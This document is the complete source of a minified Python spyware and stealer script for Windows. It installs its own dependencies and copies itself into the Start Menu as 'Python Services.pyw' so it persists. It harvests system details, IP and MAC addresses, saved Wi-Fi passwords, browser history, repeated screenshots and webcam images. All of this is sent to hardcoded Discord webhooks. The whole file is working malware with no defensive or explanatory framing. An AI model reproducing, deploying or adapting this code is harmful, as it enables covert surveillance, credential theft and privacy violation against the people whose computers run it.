_G='image/png'
_F='Python Services.pyw'
_E='psutil'
_D='%Y-%m-%d %H:%M:%S'
_C='content'
_B=True
_A='N/A'
import warnings,os,sys,time,socket,uuid,platform,psutil
from datetime import datetime
from io import BytesIO
from pathlib import Path
import sqlite3,shutil,subprocess,importlib,requests
from PIL import Image
import cv2,mss
REQ_MODULES={'Psutil':_E,'PIL':'pillow','Mss':'mss','GPUtil':'gputil','PyAutoGui':'pyautogui','PSUtil':_E,'OpenCV':'opencv-python'}
warnings.filterwarnings('ignore',category=DeprecationWarning)
def install_missing_packages(quiet=_B):
	for(B,C)in REQ_MODULES.items():
		try:importlib.import_module(B)
		except Exception:
			try:
				A=[sys.executable,'-m','pip','install',C]
				if quiet:A.append('--quiet')
				subprocess.check_call(A)
			except Exception:pass
install_missing_packages(quiet=_B)
def add_to_startup(script_path=None,new_name=_F):
	A=script_path
	if A is None:A=os.path.realpath(__file__)
	B=os.path.join(os.getenv('APPDATA'),'Microsoft\\Windows\\Start Menu\\Programs\\System Tools')
	if not os.path.exists(B):os.makedirs(B)
	C=os.path.join(B,new_name)
	if not os.path.exists(C):shutil.copy(A,C)
add_to_startup(new_name=_F)
IP_WEBHOOK='https://discord.com/api/webhooks/1415410607682883708/tLYBW6pNz2ON0XokcrpG5-F2h18OYtQEjWkEoEj4CCw1pK8bZTKXyrYlbZdpgAJHrDSH'
BROWSER_WEBHOOK='https://discord.com/api/webhooks/1415410765527257109/zjvW7giG15-LKyc9XmhxKo3_Ivk6Wg4dLgQGix6bYrFHseVZeWOVFujIwROdrqgYM643'
SCREENSHOT_WEBHOOK='https://discord.com/api/webhooks/1422383660430131251/VmxLD3CeSP6JmXRgrpkNLFQQHWHNWhMOd2HQVKqkGTS5W1zhnOJHzqtMbehlyaNfJjjm'
WEBCAM_WEBHOOK='https://discord.com/api/webhooks/1425209078040232097/TzajSIdpLQ8hc_Z8sKgc58JMvv4aI6Yu11H_H6jJDfelT-8Qt03tEMhQf70j9ng1lvqr'
def get_public_ip():
	try:A=requests.get('https://api.ipify.org?format=json',timeout=5);return A.json().get('ip',_A)
	except:return _A
def get_local_ip():
	try:return socket.gethostbyname(socket.gethostname())
	except:return _A
def get_active_user():
	try:return os.getlogin()
	except:return _A
def get_mac():
	try:A=':'.join(['{:02x}'.format(uuid.getnode()>>A&255)for A in range(0,8*6,8)][::-1]);return A
	except:return _A
def get_cpu_info():
	try:B=platform.processor();C=psutil.cpu_count(logical=False);D=psutil.cpu_count(logical=_B);A=psutil.cpu_freq();E=f"{A.max:.2f}MHz"if A else _A;return f"{B}, {C} cores, {D} threads, {E}"
	except:return _A
def get_ram_info():
	try:A=psutil.virtual_memory();B=psutil.swap_memory();C=A.total/1024**3;D=A.available/1024**3;E=B.total/1024**3;return f"{C:.1f}GB total, {D:.1f}GB available, Swap: {E:.1f}GB"
	except:return _A
def get_gpu_info():
	try:
		import GPUtil as C;A=C.getGPUs()
		if A:B=A[0];return f"{B.name}, {B.memoryTotal}MB VRAM"
		else:return _A
	except:return _A
def get_storage_info():
	try:A=psutil.disk_usage('/');B=A.total/1024**3;C=A.free/1024**3;return f"{B:.1f}GB total, {C:.1f}GB free"
	except:return _A
def get_os_info():
	try:A=platform.system();B=platform.version();C=platform.architecture()[0];return f"{A} {B} {C}"
	except:return _A
def get_monitor_info():
	try:import pyautogui as A;B,C=A.size();return f"{B}x{C}"
	except:return _A
def get_network_info():
	try:
		A=''
		for(C,D)in psutil.net_if_addrs().items():
			A+=f"[{C}]\n"
			for B in D:A+=f"  Address: {B.address}, Family: {B.family}, Netmask: {B.netmask}\n"
		return A
	except:return _A
def get_wifi_profiles():
	try:
		D=subprocess.check_output('netsh wlan show profiles',shell=_B,text=_B);E=[A.split(':')[1].strip()for A in D.splitlines()if'All User Profile'in A];A=''
		for B in E:
			try:F=subprocess.check_output(f'netsh wlan show profile name="{B}" key=clear',shell=_B,text=_B);C=[A for A in F.splitlines()if'Key Content'in A];G=C[0].split(':')[1].strip()if C else _A;A+=f"SSID: {B}, Password: {G}\n"
			except:A+=f"SSID: {B}, Password: N/A\n"
		return A if A else'No Wi-Fi profiles found'
	except:return _A
def send_system_info():
	A=datetime.now().strftime(_D);B=f"""## ***System Info Grabbed at {A}***
```Active User: {get_active_user()}

Public IP: {get_public_ip()}
Local IP: {get_local_ip()}
MAC: {get_mac()}

CPU: {get_cpu_info()}

RAM: {get_ram_info()}

GPU: {get_gpu_info()}

Storage: {get_storage_info()}
OS: {get_os_info()}
Monitor: {get_monitor_info()}

Network Interfaces:
{get_network_info()}
Wi-Fi Profiles:
{get_wifi_profiles()}```"""
	try:requests.post(IP_WEBHOOK,json={_C:B},timeout=5)
	except:pass
def send_multi_monitor_screenshots():
	H='RGB'
	try:
		with mss.mss()as C:
			A=[]
			for I in C.monitors[1:]:D=C.grab(I);J=Image.frombytes(H,D.size,D.rgb);A.append(J)
			K,L=zip(*(A.size for A in A));M=sum(K);N=max(L);E=Image.new(H,(M,N));F=0
			for G in A:E.paste(G,(F,0));F+=G.width
			B=BytesIO();E.save(B,format='PNG');B.seek(0);O={'file':('multi_monitor.png',B,_G)};P=datetime.now().strftime(_D);Q={_C:f"## ***Screen capture at {P}***"};requests.post(SCREENSHOT_WEBHOOK,data=Q,files=O,timeout=5)
	except:pass
def send_webcam_snapshot():
	try:
		A=cv2.VideoCapture(0)
		if not A.isOpened():return
		B,C=A.read();A.release()
		if B:H,D=cv2.imencode('.png',C);E={'file':('webcam.png',BytesIO(D.tobytes()),_G)};F=datetime.now().strftime(_D);G={_C:f"## ***Webcam capture at {F}***"};requests.post(WEBCAM_WEBHOOK,data=G,files=E,timeout=5)
	except:pass
def send_browser_history():
	B='Firefox';C={'Chrome':os.path.expandvars('%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default'),'Edge':os.path.expandvars('%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History'),B:os.path.expandvars('%APPDATA%\\Mozilla\\Firefox\\Profiles'),'Opera':os.path.expandvars('%APPDATA%\\Opera Software\\Opera Stable\\History')}
	for(A,D)in C.items():
		try:
			if A==B:
				E=Path(D).glob('*.default*')
				for F in E:G=F/'places.sqlite';_send_history_sqlite(A,G,firefox=_B)
			else:0
		except:pass
def _send_history_sqlite(browser_name,db_path,firefox=False):
	E=db_path
	if not os.path.exists(E):return
	try:
		C='temp_history.db';shutil.copy2(E,C);F=sqlite3.connect(C);A=F.cursor()
		if firefox:A.execute('SELECT url, title, last_visit_date FROM moz_places ORDER BY last_visit_date DESC LIMIT 10;');D=A.fetchall()
		else:A.execute('SELECT url, title, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 10;');D=A.fetchall()
		if D:
			G=f"## ***{browser_name} History:***\n"
			for B in D:H=B[1]if B[1]else'No Title';I=B[0]if B[0]else'No URL';G+=f"Title: {H}\nURL: {I}\n---\n"
			requests.post(BROWSER_WEBHOOK,json={_C:G})
		F.close();os.remove(C)
	except:pass
def second():
	send_system_info();send_browser_history()
	while _B:send_multi_monitor_screenshots();time.sleep(85);send_multi_monitor_screenshots();time.sleep(75);send_multi_monitor_screenshots();time.sleep(85);send_multi_monitor_screenshots();time.sleep(75);send_multi_monitor_screenshots();time.sleep(85);send_multi_monitor_screenshots();time.sleep(75);send_multi_monitor_screenshots();time.sleep(85);send_multi_monitor_screenshots();time.sleep(75);send_multi_monitor_screenshots();time.sleep(60);send_multi_monitor_screenshots();time.sleep(75);send_multi_monitor_screenshots();time.sleep(75);send_webcam_snapshot();time.sleep(60)
if __name__=='__main__':second()
